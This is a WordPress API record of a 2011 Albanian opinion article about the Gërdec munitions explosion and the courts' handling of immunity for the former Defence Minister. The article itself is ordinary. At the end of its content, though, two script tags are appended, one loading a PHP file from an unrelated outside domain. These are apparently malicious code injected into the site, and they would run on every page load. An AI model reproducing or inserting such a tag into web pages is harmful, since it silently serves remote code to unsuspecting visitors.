{"id":563,"date":"2011-05-01T16:40:59","date_gmt":"2011-05-01T14:40:59","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=563"},"modified":"2013-10-02T16:42:46","modified_gmt":"2013-10-02T14:42:46","slug":"kater-vjet-te-humbura","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=563","title":{"rendered":"Kat\u00ebr vjet t\u00eb humbura"},"content":{"rendered":"<p>Para 4 vjet\u00ebsh shp\u00ebrfillja e rregullave dhe e mendimit t\u00eb specialist\u00ebve p\u00ebr nd\u00ebrtimin e fabrik\u00ebs s\u00eb demontimit n\u00eb G\u00ebrdec u shpagua n\u00eb form\u00ebn m\u00eb t\u00eb keqe, me humbjen e 26 viktimave dhe plagosjen e 300 t\u00eb tjer\u00ebve. Para 3 vjet\u00ebsh Prokuroris\u00eb iu mbyll rruga e v\u00ebnies p\u00ebrpara p\u00ebrgjegj\u00ebsis\u00eb penale t\u00eb ish Ministrit t\u00eb Mbrojtjes me pretekstin se ky pask\u00ebrk\u00ebsh imunitet parlamentar dhe nuk \u00ebsht\u00eb m\u00eb i barabart\u00eb para ligjit si t\u00eb tjer\u00ebt.<\/p>\n<p>Por, para 2 vjet\u00ebsh, dy ish qytetar\u00eb t\u00eb barabart\u00eb u munduan t\u00eb vendosnin shenj\u00ebn e barazis\u00eb mes tyre dhe ish Ministrit t\u00eb Mbrotjes, jo p\u00ebr konvencion matematikor, por p\u00ebr parim juridik, kur gishti i akuz\u00ebs drejtohej si nj\u00eb busull e pavullnetshme drejt t\u00eb gjith\u00ebve atyre q\u00eb dyshohen se kurdis\u00ebn G\u00ebrdecin. K\u00ebshtu, t\u00eb akuzuarit p\u00ebr humbjen e jet\u00ebs s\u00eb 26 viktimave, Pinari, Ngjeci, Delijorgji dhe Minxolli, u prezantuan si t\u00eb pandehur q\u00eb me an\u00eb t\u00eb veprimeve t\u00eb tyre (administrative) krijuan premisat q\u00eb flak\u00ebt e G\u00ebrdecit t\u00eb ishin prelud i nj\u00eb masakre. Por veprimet administrative nuk filluan e mbaruan tek k\u00ebta kat\u00ebr persona. Dyshime t\u00eb arsyeshme binin edhe mbi kreun e Ministris\u00eb s\u00eb Mbrojtjes. Ishte boja e stilolapsit t\u00eb tij q\u00eb passolli zinxhirin e veprimeve t\u00eb t\u00eb pandehurve t\u00eb tjer\u00eb. Ja pse dy t\u00eb plagosurit, ish qytetar\u00eb t\u00eb barabart\u00eb me Ministrin, ngrit\u00ebn edhe ndaj tij nj\u00eb padi modeste penale, t\u00eb dehur nga nj\u00eb siguri juridike legjitime.<\/p>\n<p>Para 2 vjet\u00ebsh ata prisnin nga Gjykata e Lart\u00eb q\u00eb t\u00eb procedonte me vendosjen e shenj\u00ebs s\u00eb barazis\u00eb, pra me heqjen e imunitetit parlamentar dhe m\u00eb pas me gjykimin e tij. Por pik\u00ebrisht n\u00eb k\u00ebt\u00eb moment, at\u00ebher\u00eb kur mendohej se sundimi i ligjit i linte shum\u00eb pak zgjedhje Gjykat\u00ebs s\u00eb Lart\u00eb, kjo e fundit realizoi nj\u00eb nga numrat akrobatiko-juridik\u00eb m\u00eb spektakolar\u00eb, duke sfiduar t\u00eb gjith\u00eb rregullat e loj\u00ebs. Gjykata vendosi t\u00eb mos filloj\u00eb fare procedimin penal ndaj ish-Ministrit t\u00eb Mbrojtjes, duke ruajtur pozitat e tij prej qytetari jo t\u00eb barabart\u00eb me t\u00eb tjer\u00ebt para ligjit. Akrobacia juridike konsistonte n\u00eb marrjen e disa kompetencave q\u00eb Gjykata e Lart\u00eb nuk i kishte dhe nuk duhej ti kishte.<\/p>\n<p>Sipas ligjit dhe sipas t\u00eb d\u00ebmtuarve t\u00eb shp\u00ebrthimit t\u00eb G\u00ebrdecit, ai q\u00eb ngre akuz\u00ebn ka t\u00eb drejt\u00ebn ta filloj\u00eb ose jo procedimin penal. Gjykata ka vet\u00ebm t\u00eb drejt\u00ebn t\u00eb gjykoj\u00eb. Vet\u00ebm kaq. Dalja nga k\u00ebto shina e Gjykat\u00ebs s\u00eb Lart\u00eb sh\u00ebnoi nj\u00eb proces absurd dhe n\u00eb kund\u00ebrshtim me Kushtetut\u00ebn.<\/p>\n<p>Para 1 viti e gjysm\u00eb, t\u00eb d\u00ebmtuarit iu drejtuan Gjykat\u00ebs Kushtetuese q\u00eb ta zhb\u00ebnte k\u00ebt\u00eb paudh\u00ebsi t\u00eb Gjykat\u00ebs s\u00eb Lart\u00eb dhe argumentet ishin t\u00eb panum\u00ebrt. Gjykata Kushtetuese, ndon\u00ebse mori koh\u00eb m\u00eb shum\u00eb se n\u00eb raste t\u00eb tjer\u00eb, s\u00ebrish arriti t\u00eb prodhoj\u00eb m\u00eb n\u00eb fund nj\u00eb vendim pozitiv. Ajo vendosi t\u00eb shfuqizoj\u00eb vendimin e mosfillimisht t\u00eb ndjekjes penale nga ana e Gjykat\u00ebs s\u00eb Lart\u00eb, duke urdh\u00ebruar k\u00ebt\u00eb t\u00eb fundit q\u00eb t\u00eb vijoj\u00eb gjykimin, tashm\u00eb pa akrobaci dhe me k\u00ebmb\u00eb n\u00eb tok\u00eb. T\u00eb d\u00ebmtuarit kishin t\u00eb drejt\u00eb. Gjykata Kushtetuese e cil\u00ebsoi shkelje t\u00eb Kushtetut\u00ebs mosfillimin e ndjekjes penale ndaj ish Ministrit t\u00eb Mbrojtjes, cil\u00ebsoi shkelje gjithashtu edhe faktin q\u00eb u shmang nga gjykimi p\u00ebrfaq\u00ebsuesi i prokuroris\u00eb.<\/p>\n<p>So pas 4 vjet\u00ebsh ish Ministri i Mbrojtjes pritet t\u00eb gjykohet me nj\u00eb standard m\u00eb serioz nga gjykata, fal\u00eb vullnetit t\u00eb nj\u00eb t\u00eb mituri dhe nj\u00eb vajze t\u00eb re t\u00eb panjohur. Nj\u00eb gjykim i cili nuk do t\u00eb kursej\u00eb as imunitetin e ministrit, duke i barazuar qytetar\u00ebt me nj\u00ebri tjetrin m\u00eb shum\u00eb se m\u00eb par\u00eb.<\/p>\n<p>Sot, pas 4 vjet\u00ebsh nga koha q\u00eb duhet hetuar, i mituri R.D. q\u00eb paditi Ministrin \u00ebsht\u00eb rritur e \u00ebsht\u00eb b\u00ebr\u00eb burr\u00eb dhe vajza e re \u00ebsht\u00eb b\u00ebr\u00eb n\u00ebn\u00eb. N\u00ebse do t\u00eb jetonim n\u00eb nj\u00eb ambient t\u00eb mbar\u00eb juridik, sot gjykimi do kish mbaruar. Por drejt\u00ebsia e k\u00ebrkuar prej tyre \u00ebsht\u00eb ende duke hedhur hapat e par\u00eb n\u00eb pik\u00ebn zero. T\u00eb plagosurit humb\u00ebn 4 vjet nga jeta e tyre duke u endur gjykatave, por t\u00eb pakt\u00ebn dhan\u00eb sinjalin serioz q\u00eb nj\u00eb shtet ligjor mund t\u00eb ekzistoj\u00eb vet\u00ebm kur i madh e i vog\u00ebl vendosin t\u00eb mos pajtohen me paudh\u00ebsit\u00eb, t\u00eb cilitdo niveli qofshin ato.<script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Para 4 vjet\u00ebsh shp\u00ebrfillja e rregullave dhe e mendimit t\u00eb specialist\u00ebve p\u00ebr nd\u00ebrtimin e fabrik\u00ebs s\u00eb demontimit n\u00eb G\u00ebrdec u [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":564,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6,5],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/563"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=563"}],"version-history":[{"count":1,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/563\/revisions"}],"predecessor-version":[{"id":565,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/563\/revisions\/565"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/564"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=563"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=563"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=563"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}